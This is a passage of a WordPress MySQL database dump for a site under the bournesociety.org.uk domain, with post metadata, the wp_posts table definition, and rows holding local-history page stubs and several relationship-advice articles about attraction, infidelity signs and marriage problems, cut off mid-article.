invalid.\";}'),(1093,323,'_additional_settings',''),(1094,323,'_locale','en_US'),(1099,327,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(1100,327,'_menu_item_type','post_type'),(1101,327,'_menu_item_menu_item_parent','0'),(1102,327,'_menu_item_object_id','56'),(1103,327,'_menu_item_object','post'),(1104,327,'_menu_item_target',''),(1105,327,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1106,327,'_menu_item_xfn',''),(1107,327,'_menu_item_url',''),(1108,328,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(1109,328,'_menu_item_type','post_type'),(1110,328,'_menu_item_menu_item_parent','0'),(1111,328,'_menu_item_object_id','55'),(1112,328,'_menu_item_object','post'),(1113,328,'_menu_item_target',''),(1114,328,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1115,328,'_menu_item_xfn',''),(1116,328,'_menu_item_url',''),(1117,329,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(1118,329,'_menu_item_type','post_type'),(1119,329,'_menu_item_menu_item_parent','0'),(1120,329,'_menu_item_object_id','60'),(1121,329,'_menu_item_object','post'),(1122,329,'_menu_item_target',''),(1123,329,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1124,329,'_menu_item_xfn',''),(1125,329,'_menu_item_url',''),(1126,330,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(1127,330,'_menu_item_type','post_type'),(1128,330,'_menu_item_menu_item_parent','328'),(1129,330,'_menu_item_object_id','53'),(1130,330,'_menu_item_object','post'),(1131,330,'_menu_item_target',''),(1132,330,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1133,330,'_menu_item_xfn',''),(1134,330,'_menu_item_url',''),(1135,331,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(1136,331,'_menu_item_type','post_type'),(1137,331,'_menu_item_menu_item_parent','0'),(1138,331,'_menu_item_object_id','52'),(1139,331,'_menu_item_object','post'),(1140,331,'_menu_item_target',''),(1141,331,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1142,331,'_menu_item_xfn',''),(1143,331,'_menu_item_url',''),(1144,332,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(1145,332,'_menu_item_type','post_type'),(1146,332,'_menu_item_menu_item_parent','328'),(1147,332,'_menu_item_object_id','54'),(1148,332,'_menu_item_object','post'),(1149,332,'_menu_item_target',''),(1150,332,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1151,332,'_menu_item_xfn',''),(1152,332,'_menu_item_url',''),(1153,333,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(1154,333,'_menu_item_type','post_type'),(1155,333,'_menu_item_menu_item_parent','0'),(1156,333,'_menu_item_object_id','51'),(1157,333,'_menu_item_object','post'),(1158,333,'_menu_item_target',''),(1159,333,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1160,333,'_menu_item_xfn',''),(1161,333,'_menu_item_url',''),(1164,334,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(1165,334,'_edit_last','1'),(1166,334,'_wp_page_template','default'),(1167,335,'_adinserter_block_exceptions',''),(1168,335,'_wpb_vc_js_status','false'),(1169,335,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(1170,335,'_menu_item_type','post_type'),(1171,335,'_menu_item_menu_item_parent','0'),(1172,335,'_menu_item_object_id','334'),(1173,335,'_menu_item_object','page'),(1174,335,'_menu_item_target',''),(1175,335,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1176,335,'_menu_item_xfn',''),(1177,335,'_menu_item_url',''),(1178,334,'_adinserter_block_exceptions',''),(1179,334,'_wpb_vc_js_status','false'),(1180,334,'_edit_lock','1507112802:1'),(1181,339,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(1182,339,'_edit_last','1'),(1183,339,'_edit_lock','1507113533:1'),(1184,339,'_wp_page_template','default'),(1185,340,'_adinserter_block_exceptions',''),(1186,340,'_wpb_vc_js_status','false'),(1187,340,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(1188,340,'_menu_item_type','post_type'),(1189,340,'_menu_item_menu_item_parent','0'),(1190,340,'_menu_item_object_id','339'),(1191,340,'_menu_item_object','page'),(1192,340,'_menu_item_target',''),(1193,340,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1194,340,'_menu_item_xfn',''),(1195,340,'_menu_item_url',''),(1196,339,'_adinserter_block_exceptions',''),(1197,339,'_wpb_vc_js_status','false'),(1198,343,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(1199,343,'_menu_item_type','post_type'),(1200,343,'_menu_item_menu_item_parent','0'),(1201,343,'_menu_item_object_id','334'),(1202,343,'_menu_item_object','page'),(1203,343,'_menu_item_target',''),(1204,343,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1205,343,'_menu_item_xfn',''),(1206,343,'_menu_item_url',''),(1207,344,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(1208,344,'_menu_item_type','post_type'),(1209,344,'_menu_item_menu_item_parent','0'),(1210,344,'_menu_item_object_id','339'),(1211,344,'_menu_item_object','page'),(1212,344,'_menu_item_target',''),(1213,344,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1214,344,'_menu_item_xfn',''),(1215,344,'_menu_item_url',''),(1217,6,'wpmdr_menu','1'),(1218,346,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(1219,346,'_edit_last','1'),(1220,346,'_edit_lock','1525961665:1'),(1221,347,'_wp_attached_file','2018/05/graveyard.jpg'),(1222,347,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:21:\"2018/05/graveyard.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"graveyard-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"graveyard-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"graveyard-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:6:\"ILCE-7\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"57\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:17:\"0.016666666666667\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1223,347,'_wp_attachment_image_alt','Funeral directors can help you plan your funeral'),(1224,346,'_thumbnail_id','347'),(1226,346,'_adinserter_block_exceptions',''),(1227,346,'wpmdr_menu','1'),(1229,339,'wpmdr_menu','1'),(1235,60,'wpmdr_menu','1'),(1236,61,'wpmdr_menu','1'),(1237,334,'wpmdr_menu','1'),(1238,8,'wpmdr_menu','1'),(1239,30,'wpmdr_menu','1'),(1240,32,'wpmdr_menu','1'),(1241,48,'wpmdr_menu','1'),(1242,45,'wpmdr_menu','1'),(1243,31,'wpmdr_menu','1'),(1244,40,'wpmdr_menu','1'),(1245,36,'wpmdr_menu','1'),(1246,29,'wpmdr_menu','1'),(1247,28,'wpmdr_menu','1'),(1248,27,'wpmdr_menu','1'),(1249,16,'wpmdr_menu','1'),(1250,14,'wpmdr_menu','1'),(1251,10,'wpmdr_menu','1'),(1252,12,'wpmdr_menu','1'),(1254,60,'_edit_lock','1532693601:1'),(1255,60,'_edit_last','1'),(1257,60,'_adinserter_block_exceptions',''),(1258,354,'_wp_attached_file','2017/10/family.jpg'),(1259,354,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:639;s:4:\"file\";s:18:\"2017/10/family.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"family-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"family-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:18:\"family-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:2:\"22\";s:6:\"credit\";s:25:\"https://www.maxpixel.net/\";s:6:\"camera\";s:21:\"Canon EOS 5D Mark III\";s:7:\"caption\";s:42:\"Summer Happy Sunset Beach Happiness Family\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:21:\"Copyright by MaxPixel\";s:12:\"focal_length\";s:2:\"50\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:17:\"0.066666666666667\";s:5:\"title\";s:42:\"Summer Happy Sunset Beach Happiness Family\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:1:{i:0;s:133:\"Family,Sunset,Beach,Happiness,Summer,Happy,Freedom,Silhouette,Vacation,Joy,Bliss,Together,Holding Hands,MaxPixel,FreeGreatPicture.com\";}}}'),(1260,354,'_wp_attachment_image_alt','What happens during a divorce?'),(1263,356,'_wp_attached_file','2017/10/children.jpg'),(1264,356,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:20:\"2017/10/children.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"children-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"children-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"children-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1265,356,'_wp_attachment_image_alt','Happy children during a divorce'),(1268,34,'_adinserter_block_exceptions',''),(1271,54,'_adinserter_block_exceptions','');
/*!40000 ALTER TABLE `wp_postmeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_posts`
--

DROP TABLE IF EXISTS `wp_posts`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_posts` (
  `ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `post_author` bigint(20) unsigned NOT NULL DEFAULT 0,
  `post_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_content` longtext NOT NULL,
  `post_title` text NOT NULL,
  `post_excerpt` text NOT NULL,
  `post_status` varchar(20) NOT NULL DEFAULT 'publish',
  `comment_status` varchar(20) NOT NULL DEFAULT 'open',
  `ping_status` varchar(20) NOT NULL DEFAULT 'open',
  `post_password` varchar(255) NOT NULL DEFAULT '',
  `post_name` varchar(200) NOT NULL DEFAULT '',
  `to_ping` text NOT NULL,
  `pinged` text NOT NULL,
  `post_modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_modified_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_content_filtered` longtext NOT NULL,
  `post_parent` bigint(20) unsigned NOT NULL DEFAULT 0,
  `guid` varchar(255) NOT NULL DEFAULT '',
  `menu_order` int(11) NOT NULL DEFAULT 0,
  `post_type` varchar(20) NOT NULL DEFAULT 'post',
  `post_mime_type` varchar(100) NOT NULL DEFAULT '',
  `comment_count` bigint(20) NOT NULL DEFAULT 0,
  PRIMARY KEY (`ID`),
  KEY `post_name` (`post_name`(191)),
  KEY `type_status_date` (`post_type`,`post_status`,`post_date`,`ID`),
  KEY `post_parent` (`post_parent`),
  KEY `post_author` (`post_author`)
) ENGINE=InnoDB AUTO_INCREMENT=377 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_posts`
--

LOCK TABLES `wp_posts` WRITE;
/*!40000 ALTER TABLE `wp_posts` DISABLE KEYS */;
INSERT INTO `wp_posts` VALUES (6,1,'2017-08-22 12:21:21','2017-08-22 12:21:21','','Bournesoc','','publish','closed','closed','','bournesoc','','','2017-08-22 12:21:21','2017-08-22 12:21:21','',0,'http://www.bournesociety.org.uk/?page_id=6',0,'page','',0),(7,1,'2017-08-22 12:21:21','2017-08-22 12:21:21','','Bournesoc','','inherit','closed','closed','','6-revision-v1','','','2017-08-22 12:21:21','2017-08-22 12:21:21','',6,'http://www.bournesociety.org.uk/6-revision-v1',0,'revision','',0),(8,1,'2017-08-22 12:21:40','2017-08-22 12:21:40','','bournesoc/5-coulsdon.html','','publish','closed','closed','','bournesoc5-coulsdon-html','','','2017-08-22 12:21:40','2017-08-22 12:21:40','',0,'http://www.bournesociety.org.uk/?page_id=8',0,'page','',0),(9,1,'2017-08-22 12:21:40','2017-08-22 12:21:40','','bournesoc/5-coulsdon.html','','inherit','closed','closed','','8-revision-v1','','','2017-08-22 12:21:40','2017-08-22 12:21:40','',8,'http://www.bournesociety.org.uk/8-revision-v1',0,'revision','',0),(10,1,'2017-08-22 12:21:52','2017-08-22 12:21:52','','/bournesoc/bourne-society-maps.html','','publish','closed','closed','','bournesocbourne-society-maps-html','','','2017-08-22 12:21:52','2017-08-22 12:21:52','',0,'http://www.bournesociety.org.uk/?page_id=10',0,'page','',0),(11,1,'2017-08-22 12:21:52','2017-08-22 12:21:52','','/bournesoc/bourne-society-maps.html','','inherit','closed','closed','','10-revision-v1','','','2017-08-22 12:21:52','2017-08-22 12:21:52','',10,'http://www.bournesociety.org.uk/10-revision-v1',0,'revision','',0),(12,1,'2017-08-22 12:22:06','2017-08-22 12:22:06','','/bournesoc/27-smitham-railway-station-coulsdon.html','','publish','closed','closed','','bournesoc27-smitham-railway-station-coulsdon-html','','','2017-08-22 12:22:06','2017-08-22 12:22:06','',0,'http://www.bournesociety.org.uk/?page_id=12',0,'page','',0),(13,1,'2017-08-22 12:22:06','2017-08-22 12:22:06','','/bournesoc/27-smitham-railway-station-coulsdon.html','','inherit','closed','closed','','12-revision-v1','','','2017-08-22 12:22:06','2017-08-22 12:22:06','',12,'http://www.bournesociety.org.uk/12-revision-v1',0,'revision','',0),(14,1,'2017-08-22 12:22:25','2017-08-22 12:22:25','','/bournesoc/24-smitham-bottom-infants-school-smitham.html','','publish','closed','closed','','bournesoc24-smitham-bottom-infants-school-smitham-html','','','2017-08-22 12:22:25','2017-08-22 12:22:25','',0,'http://www.bournesociety.org.uk/?page_id=14',0,'page','',0),(15,1,'2017-08-22 12:22:25','2017-08-22 12:22:25','','/bournesoc/24-smitham-bottom-infants-school-smitham.html','','inherit','closed','closed','','14-revision-v1','','','2017-08-22 12:22:25','2017-08-22 12:22:25','',14,'http://www.bournesociety.org.uk/14-revision-v1',0,'revision','',0),(16,1,'2017-08-22 12:22:37','2017-08-22 12:22:37','','/bournesoc/images/stories/bsimages/maps/Bainbridge-IGP1962.jpg','','publish','closed','closed','','bournesocimagesstoriesbsimagesmapsbainbridge-igp1962-jpg','','','2017-08-22 12:22:37','2017-08-22 12:22:37','',0,'http://www.bournesociety.org.uk/?page_id=16',0,'page','',0),(17,1,'2017-08-22 12:22:37','2017-08-22 12:22:37','','/bournesoc/images/stories/bsimages/maps/Bainbridge-IGP1962.jpg','','inherit','closed','closed','','16-revision-v1','','','2017-08-22 12:22:37','2017-08-22 12:22:37','',16,'http://www.bournesociety.org.uk/16-revision-v1',0,'revision','',0),(18,1,'2017-08-22 12:25:26','2017-08-22 12:25:26','','Home','','publish','closed','closed','','home','','','2017-08-22 12:25:26','2017-08-22 12:25:26','',0,'http://www.bournesociety.org.uk/?p=18',1,'nav_menu_item','',0),(19,1,'2017-08-22 12:25:26','2017-08-22 12:25:26','','Infants School','','publish','closed','closed','','infants-school','','','2017-08-22 12:25:26','2017-08-22 12:25:26','',0,'http://www.bournesociety.org.uk/?p=19',2,'nav_menu_item','',0),(20,1,'2017-08-22 12:25:26','2017-08-22 12:25:26','','Railway Station','','publish','closed','closed','','railway-station','','','2017-08-22 12:25:26','2017-08-22 12:25:26','',0,'http://www.bournesociety.org.uk/?p=20',3,'nav_menu_item','',0),(21,1,'2017-08-22 12:25:26','2017-08-22 12:25:26','','Society Maps','','publish','closed','closed','','society-maps','','','2017-08-22 12:25:26','2017-08-22 12:25:26','',0,'http://www.bournesociety.org.uk/?p=21',4,'nav_menu_item','',0),(22,1,'2017-08-22 12:25:26','2017-08-22 12:25:26','','Bainbridge Map','','publish','closed','closed','','bainbridge-map','','','2017-08-22 12:25:26','2017-08-22 12:25:26','',0,'http://www.bournesociety.org.uk/?p=22',5,'nav_menu_item','',0),(23,1,'2017-08-22 12:25:26','2017-08-22 12:25:26',' ','','','publish','closed','closed','','23','','','2017-08-22 12:25:26','2017-08-22 12:25:26','',0,'http://www.bournesociety.org.uk/?p=23',6,'nav_menu_item','',0),(24,1,'2017-08-22 12:25:26','2017-08-22 12:25:26','','Coulsdon','','publish','closed','closed','','coulsdon','','','2017-08-22 12:25:26','2017-08-22 12:25:26','',0,'http://www.bournesociety.org.uk/?p=24',7,'nav_menu_item','',0),(27,1,'2017-10-04 09:07:52','2017-10-04 09:07:52','<div id=\"content\" class=\"hfeed\">\n\n			<div class=\"post-1198 post type-post status-publish format-standard hentry category-marriage tag-affair tag-having-an-affair tag-marriage tag-partner tag-relationship post_box top\" id=\"post-1198\">\n				<div class=\"headline_area\">\n					<h1 class=\"entry-title\">10 Tips To Get Your Partner To Be Attracted To You Again</h1>\n					<p class=\"headline_meta\"> </p>\n				</div>\n			  <div class=\"format_text entry-content\">\n<p><span class=\"drop_cap\">I</span>t happens to the best of us, for one reason or another your partner is not physically attracted to you anymore.</p>\n<p>Your partner may be stressed or distracted, emotionally shutdown due to a build up of relationship deficiencies and toxicities including loss of respect or judgment of you, or he/she is having an affair or the two of you are on a relationship break or are already broken up.</p>\n<p>Whatever the case may be if the attraction was once there then it is possible to <strong><a href=\"../men-–-can-this-save-a-marriage/\">get that attraction back</a></strong>. <span id=\"more-1198\"></span></p>\n<p>The following are 10 Simple Tips that can reignite that flame in your relationship:</p>\n<p><strong>1) Be Detached:</strong></p>\n<p>When we are attached to anything in our life, we have a tendency to make decisions based on fear or desperation when it comes to what it is that we are attached to and nothing repels a person more than someone who is coming across as desperate. So when you get into a state of detachment you win in at least two ways</p>\n<p>a) You are sensible enough to make rational, functional decisions</p>\n<p>b)You do not care about the outcome of the situation so you will come across as stable and confident.</p>\n<p><strong>2) Be Confident:</strong></p>\n<p>Speaking of being confident, the reality is being confident is attractive and appealing and these are the two things that you want to be to your partner. So fake it if you have to but make it your mission to look, feel and just plain be confident about yourself.</p>\n<p><strong>3) Be Just a Tad Flirty</strong>:</p>\n<p>Less is more – flirt just a little bit so your partner gets a hint of what you are like when you flirt. Be like a Movie Trailer Teaser so your partner is left wanting more, even just simple things like if you are a woman – flipping your hair back or playing with your necklace as examples.</p>\n<p><strong>4) Look Good Without Over Doing It: </strong></p>\n<p>Getting a complete make-over and plastic surgery gives the impression that you have an agenda to get your partner back and/or attracted to you and if he/she is not ready,this will push him/her away, so just subtly dress a little bit more provocatively and put some highlights in your hair and a little more make-up, maybe a new perfume or cologne etc.</p>\n<p><strong>5) Match Level of Physical Commitment:</strong></p>\n<p>At our Centre we talk about Matching Level of Commitment meaning that if you pursue someone the other person’s 1st instinct if he (she) is at a different level of commitment is to run away – therefore you must match his/her level of commitment.</p>\n<p>The same goes for physical commitment, if he/she steps back, you step back, he/she moves in closer,you move in closer and then every once in a while throw in a little brush of a leg or an arm “by accident” so there is a little element of surprise.</p>\n<p><strong>6) Compliment:</strong></p>\n<p>If your partner has closed him/herself off physically from you there is usually an underlying emotional reason, so might as well make any interaction that you have with your partner an emotionally pleasant one and give compliments to your partner whenever possible without over doing it, this will warm him/her up both emotionally and physically.</p>\n<p><strong>7) Be Unconditional:</strong></p>\n<p>Let’s face it the world is a conditional place, so one of the best ways to help let your partner’s guard down is by being unconditionally loving towards him or her, no matter what he (she) is doing or saying or not doing or saying – love him/her anyway.</p>\n<p>Even if you don’t say it out loud, make a decision to feel this way towards him (her) as well as not criticize him/her about anything and he (she) will begin to physically loosen up as well as emotionally begin letting his/her guard down.</p>\n<p><strong>8) Be Fun Without Overdoing It:</strong></p>\n<p>O.k. no swinging off the chandelier, being too much fun indicates that you are trying too hard, so just be fun in an easy, breezy relaxed way and your partner will follow suit. Plus laughter is a great bonding experience and promotes the release of the feel good brain chemical Serotonin, so your partner will be able to connect and have a sense of well-being around you.</p>\n<p><strong>9) Validate:</strong></p>\n<p>Nothing shuts a person down more than constantly being invalidated and since everything is made up of energy. Your partner’s interest and energy for sex is going take a plunge as well, so try out an experiment and see what happens if you keep validating your partner even if he/she is completely wrong in his (her) views and see how much more affectionate and attracted he (she) will be towards you overtime.</p>\n<p><strong>10) Be Open To Others Flirting With You:</strong></p>\n<p>You may be one of those people who are 100% loyal and attentive to your partner and the thought of you flirting with others makes you cringe. However, in this situation a little, just a touch of flirting with others is just what it takes to make your partner realize that other people find you attractive.</p>\n<p>A little flirting with others will get your partner thinking that he or she may be missing out on something or is going to miss out on something if he (she) doesn’t start reconsidering his/her current decision of not giving you the time of day romantically, physically or sexually.</p>\n<p>So these tips may sound simple but simplicity is a good thing so that you do not push your partner further away, with just the right balance of detachment and interest before you know it you will literally be back in the arms of your partner.</p>\n<p>Melody Chase is a Relationship Counsellor and Writer at the Centre For Life Management. If you wish to  or relationship alone, we can help! Check out our breakthrough Counsellor in a Box” system at <strong><a href=\"../go/counsellorinabox/\" rel=\"external nofollow\">http://www.counsellorinabox.com</a></strong></p>\n<p class=\"alert\">\n			  </p></div>\n				<div class=\"prev_next post_nav\">\n				  </div>\n		</div>\n\n		<div id=\"sidebars\">\n			<div id=\"sidebar_1\" class=\"sidebar\">\n				<h3>Free Marriage Books</h3>			<div class=\"textwidget\"><p>Download free marriage books, containing advice on how to save a marriage and get answers to many other kinds of marriage problems - including infidelity and marital relationships in general.</p>\n<p align=\"center\"> </p>\n</div>\n		\n						\n			</div>\n		</div>\n	</div>','Get Your Partner To Be Attracted To You Again','Is your partner not physically attracted to you anymore? Don\'t worry, because if the attraction was once there then it is possible to get that attraction back.','publish','open','open','','get-your-partner-to-be-attracted-to-you-again','','','2017-10-04 09:07:52','2017-10-04 09:07:52','',0,'http://www.bournesociety.org.uk/get-your-partner-to-be-attracted-to-you-again',0,'post','',0),(28,1,'2017-10-04 09:08:13','2017-10-04 09:08:13','<div id=\"content\" class=\"hfeed\">\n\n			<div class=\"post-24 post type-post status-publish format-standard hentry category-affairs tag-affair tag-cheating tag-cheating-wife tag-confession tag-make tag-relationship tag-suspicions post_box top\" id=\"post-24\">\n				<div class=\"headline_area\">\n					<h1 class=\"entry-title\">3 common signs your partner may be cheating on you				</h1>\n				</div>\n				<div class=\"format_text entry-content\">\n<p>An unfaithful husband, cheating wife, any kind of disloyal partner,  is an ugly prospect. And that feeling of being betrayed by someone we  thought we could trust more than anyone else is one of the worst.  </p>\n<p>People who discover their partners have been unfaithful to them go through a hurricane of different emotions  anger, sadness, shame,  dejection, sometimes even relief. It’s a grieving process, not of a  person that’s died, but of a relationship and level of trust that’s  instantly disintegrated. In short, it sucks.<span id=\"more-24\"></span></p>\n<p></p>\n<p>But before you can begin grieve that loss of trust, or simply  throw caution to the wind and ditch your partner for good, you need to  make absolutely sure your reaction will be 100% warranted. You need to  know without doubt whether your lover has, in fact, double-crossed you  by looking for, finding, and partaking in, an affair.</p>\n<p>The only guaranteed way of knowing this, aside from finding damning  physical evidence or seeing the affair with your own eyes (both pretty  rare), is by hearing a confession straight from the horse’s mouth, by  communicating your suspicions with your partner and listening to what  they have to say  however heartbreaking or relieving their response  might be. </p>\n<p>But before you take that big step, there are a few simpler  and smaller steps you can take to make the whole process, the whole  investigation and confrontation of your partner, easier and more  factually accurate.</p>\n<p>The first thing you should do is look for some of the most common  signs/groups of signs people produce when they cheat. I’ve listed 3 of  them below. Read over and think about each and carefully consider if  they apply to you, your partner and your relationship.</p>\n<p><strong>1.  Changes in sex drive and sexual behaviour.</strong></p>\n<p>Sex is almost always an integral part of a happy and healthy  relationship between two people. So when one of the two, regardless of  whether it’s the guy or the girl, begins to cheat, it doesn’t come as  any surprise that changes in the way they feel about having sex with  their partner can be brought about. </p>\n<p>There are two main ways these  changes can manifest themselves. When the cheater initially begins  their affair, they may  out of guilt and in an effort to avoid the  newly formed affair being rumbled  actually increase the amount of  attention they pay their real partners in bed. </p>\n<p>Conversely, and usually  a little while after the affair has begun, the cheater may appear to  have a loss of sex drive. They, for some reason, seem to not want to be  intimate with you as much as they used to. Once again, this can be  attributed to guilt, but more often it’s to do with a fear they’ll  reveal their infidelity through they way they behave before, during and  after having sex with you.</p>\n<p><strong>2.  Peculiar changes in habits &amp; schedule</strong></p>\n<p>When people cheat, they invariably change their behaviour and/or  habits in some way, small or large. The reason they cannot avoid these  alterations is because, no matter how infrequently or secretly they see  the person they’re having an affair with, they MUST  at some point or  another  go out of their way to do so (and thereby break or change  habits and behaviour). </p>\n<p>So, look for recent and pronounced modifications  in the times they come home/leave the house (and whether the changed  times ‘repeat’ weekly), increased usage of the phone or computer for no  obvious/innocent reason, and other differences in the way your partner  acts and behaves. </p>\n<p>You know your partner’s old habits and ways of living  better than anyone, so draw from that knowledge to compare how they  might have changed them and to decide if the changes are to be taken as  possible indications of betrayal.</p>\n<p><strong>3.  Miscellaneous indicators of infidelity.</strong></p>\n<p>Lastly, there’s the group of infidelity indicators that don’t fit in  any other box or under any other title. They’re the things you notice,  question and cannot innocently explain away. They’re the things you  spot but almost choose to forget because you’re so unsure of what they  may or may not mean and whether, ultimately, they are true signs that  your partner is cheating on you with someone else. Here are just a  couple of miscellaneous indications of infidelity:</p>\n<p>A. Your partner no longer seems to get angry with you when in the  past they always seemed to be picking a fight or getting worked up over  any tiny issue. Cheaters often ‘let their partners off’ because they  want as little confrontation (which could lead to a discovery on your  part) as possible.</p>\n<p>B. She or he frequently shifts the focus onto you. Cheaters often  asks their partners more questions about how their day went, how  they’re feeling, etc, again, to shift the attention away from them and  their guilt.</p>\n<p>Remember, when you suspect your partner may be cheating, always take  the smaller steps  by looking for the kinds of subtle signs listed  above  before taking the biggest step of all: confronting them. Doing  so will give you the very best chance of a happy, or at least a more  manageable, final outcome.</p>\n<p> </p>				</div>\n			</div>\n\n  \n 			<div id=\"comments\">\n<div class=\"comments_closed\">\n	\n</div>\n			</div>\n					<div class=\"prev_next post_nav\"></div>\n		</div>','Signs partner may be cheating','An unfaithful husband, cheating wife, any kind of disloyal partner, is an ugly prospect. And that feeling of being betrayed by someone we thought we coul','publish','open','open','','signs-partner-may-be-cheating','','','2017-10-04 09:08:13','2017-10-04 09:08:13','',0,'http://www.bournesociety.org.uk/signs-partner-may-be-cheating',0,'post','',0),(29,1,'2017-10-04 09:09:49','2017-10-04 09:09:49','<div id=\"content\" class=\"hfeed\">\n\n			<div class=\"post-129 post type-post status-publish format-standard hentry category-marriage tag-communication tag-couples tag-disagreement tag-help tag-help-marriage tag-make tag-marriage-problem tag-partner tag-really tag-relationship post_box top\" id=\"post-129\">\n				<div class=\"headline_area\">\n					<h1 class=\"entry-title\">3 Keys To Transform Your Marriage				</h1>\n				</div>\n				<div class=\"format_text entry-content\">\n<p>\n</p><p>Recognizing you have a marriage problem is the first step along the road to transforming your marriage, and for most couples simply acknowledging there is a problem shatters the marriage myth. <span id=\"more-129\"></span></p>\n<p>We are taught in school how to do sums, how to read and recognize Shakespeare, and how to conduct scientific experiments, but what do we really know about the greatest social experiment of all, namely our ability to keep the love alive in our marriage?</p>\n<p>The fact is we know surprisingly little, and from the moment we say “I do,” we are literally flying by the seat of our pants. We don’t get a manual or a textbook telling us how to get it right, so our marriage becomes an evolving set of experiments, learning and discovering more and more about ourselves and each other, and figuring out what works and what doesn’t.</p>\n<p>Some say if we don’t make mistakes we don’t really learn, but what do those mistakes cost us, and is the cost too high for some couples?</p>\n<p>That’s why I have 3 ways to instantly transform your marriage. These are 3 things that you know will work and will help you get your marriage back on track. Let’s call this your error-free way to redeem yourself and your marriage in the eyes of your partner and show them that you are committed to making positive changes in your marriage.</p>\n<p>The first key to transforming your marriage is to stop looking at your issues on a case-by-case basis. Couples that try to solve arguments by going into the 